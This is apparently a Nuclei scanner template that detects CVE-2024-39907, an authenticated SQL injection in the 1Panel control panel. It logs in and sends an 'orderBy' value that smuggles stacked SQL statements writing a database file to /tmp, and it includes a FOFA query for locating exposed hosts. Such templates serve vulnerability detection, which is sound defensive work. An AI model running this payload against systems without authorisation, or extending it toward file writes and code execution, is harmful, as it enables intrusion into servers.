nuclei-templates/http/cves/2024/CVE-2024-39907.yaml

52 lines
2.1 KiB
YAML

id: CVE-2024-39907
info:
name: 1Panel SQL Injection - Authenticated
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
1Panel is a web-based linux server management control panel. There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. These sql injections have been resolved in version 1.10.12-tls. Users are advised to upgrade. There are no known workarounds for these issues.
reference:
- https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-5grx-v727-qmq6
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-39907
cwe-id: CWE-89
epss-score: 0.00043
epss-percentile: 0.09387
metadata:
verified: true
max-request: 2
fofa-query: icon_hash="1300107149" || icon_hash="1453309674" || cert.issuer.cn="1Panel Intermediate CA"
tags: cve,cve2024,sqli,1panel,authenticated
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /api/v1/auth/login HTTP/1.1
Host: {{Hostname}}
EntranceCode: ZW50cmFuY2U=
Content-Type: application/json
{"name":"{{username}}","password":"{{password}}","ignoreCaptcha":true,"authMethod":"session","language":"en"}
- |
POST /api/v1/hosts/command/search HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"page":1,"pageSize":10,"groupID":0,"orderBy":"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;","order":"ascending","name":"a"}
matchers-condition: and
matchers:
- type: dsl
dsl:
- contains_all(body_2, "SQL logic error","table exp already exists")
- contains(header_1, 'psession')
condition: and
# digest: 4a0a0047304502207a2fc8ad9c41d36e76e2405dd372a3c3b1e23cdb7aae86fe21aa9395e37fc307022100a6abdb6d7d79e5715931d0216fa0a2f44d2adb4a35fe03b29b776e2fa9b2d5ae:922c64590222798bb761d5b6d8e72950